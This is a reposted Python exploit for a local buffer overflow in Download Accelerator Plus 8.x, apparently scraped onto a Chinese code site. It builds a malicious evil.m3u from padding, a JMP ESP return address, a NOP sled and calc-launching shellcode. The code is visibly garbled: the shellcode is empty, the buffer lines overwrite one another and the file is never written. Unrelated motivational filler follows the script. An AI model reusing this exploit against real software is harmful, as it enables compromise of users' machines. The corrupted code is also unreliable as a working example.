Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <>
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]

from struct import pack

shellcode = (

RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)

m3u = 'http://localhost/verify_me________________________________%s.mp3'
buf = 'A' * 14074
buf = pack('<L', RET)
buf = '\x90' * 32
buf = shellcode
m3u %= buf

fd = open('evil.m3u', 'wb')

print 'DONE, import the evil.m3u and click "Verify"'

# EoF

以上就是Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day 。别老想着取悦别人,你越在乎别人,就越卑微。只有提升自己,取悦自己,并让别人来取悦你,才会令你更有价值。一辈子不长,记住:对自己好点。早安!更多关于Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day 请关注haodaima.com其它相关文章!